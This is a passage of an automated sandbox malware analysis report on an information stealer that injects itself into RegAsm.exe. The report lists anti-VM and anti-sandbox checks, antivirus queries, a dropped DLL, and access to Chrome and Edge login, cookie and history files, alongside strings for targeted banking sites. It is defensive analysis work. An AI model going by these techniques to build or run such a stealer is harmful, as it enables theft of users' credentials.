                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B681BF9 push ecx; ret 2_2_1B824C03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6810C8 push ecx; ret 2_2_1B883552
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dllJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418AFD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418AFD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                Source: RegAsm.exe, 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sqls[1].dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-20409
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410ACD GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410BE0h2_2_00410ACD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100D5B1 FindFirstFileExW,0_2_0100D5B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2FF _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D2FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C0F8 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040C0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A17A _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040A17A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417295 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00417295
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A595 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040A595
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B616 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040B616
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004176DE _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004176DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416824 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_00416824
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040AC07 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040AC07
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416EF1 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00416EF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00416C71 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00416C71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410C69 GetSystemInfo,wsprintfA,2_2_00410C69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                Source: JEHIID.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: JEHIID.2.drBinary or memory string: discord.comVMware20,11696428655f
                Source: JEHIID.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: global block list test formVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326265923.000000000113A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: JEHIID.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: JEHIID.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: JEHIID.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: JEHIID.2.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: JEHIID.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: JEHIID.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: JEHIID.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: JEHIID.2.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: JEHIID.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: JEHIID.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: JEHIID.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: JEHIID.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: RegAsm.exe, 00000002.00000002.3326127639.00000000010A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: JEHIID.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: JEHIID.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: RegAsm.exe, 00000002.00000002.3326265923.00000000011B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWA
                Source: JEHIID.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: JEHIID.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-90944
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFE423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FFE423
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418AFD GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418AFD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100C44B mov eax, dword ptr fs:[00000030h]0_2_0100C44B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010049AA mov ecx, dword ptr fs:[00000030h]0_2_010049AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01010CFB GetProcessHeap,0_2_01010CFB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFE423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FFE423
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA52A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FFA52A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA686 SetUnhandledExceptionFilter,0_2_00FFA686
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA7C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00FFA7C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A8CF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041A8CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041F988 SetUnhandledExceptionFilter,2_2_0041F988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041BDF7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041BDF7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6842AF SetUnhandledExceptionFilter,2_2_1B6842AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B682C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_1B682C8E

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6360, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00FC018D
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411FA6 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_00411FA6
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000Jump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DDC008Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA215 cpuid 0_2_00FFA215
                Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_01010135
                Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_010103D7
                Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_01007515
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_01010548
                Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_01010422
                Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_010104BD
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0101079B
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_010109CA
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_010108C4
                Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_01007A3B
                Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_01010A99
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_00410ACD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_1B682112
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,2_2_1B682112
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,2_2_1B85FF17
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_1B68298C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFA424 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FFA424
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004109B3 GetProcessHeap,HeapAlloc,GetUserNameA,2_2_004109B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410A7A GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_00410A7A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: RegAsm.exe, 00000002.00000002.3326524144.0000000001268000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6360, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.ff0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6360, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6FDB10 sqlite3_initialize,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_1B6FDB10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B725910 sqlite3_mprintf,sqlite3_bind_int64,2_2_1B725910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7AD9E0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1B7AD9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B701FE0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B701FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6FDFC0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_bind_text,sqlite3_step,sqlite3_reset,2_2_1B6FDFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B695C70 sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,2_2_1B695C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B73D3B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B73D3B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7251D0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B7251D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B719090 sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_errmsg,sqlite3_mprintf,2_2_1B719090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B75D610 sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B75D610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7255B0 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_1B7255B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7AD4F0 sqlite3_bind_value,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1B7AD4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B7A14D0 sqlite3_bind_int64,sqlite3_log,sqlite3_log,sqlite3_log,2_2_1B7A14D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B8970 sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_1B6B8970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B694820 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_reset,sqlite3_initialize,2_2_1B694820
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1B6B0FB0 sqlite3_result_int64,sqlite3_result_double,sqlite3_result_int,sqlite3_prepare_v3,sqlite3_bind_int64,sqlite3_step,sqlite3_column_value,sqlite3_result_value,sqlite3_reset,2_2_1B6B0FB0
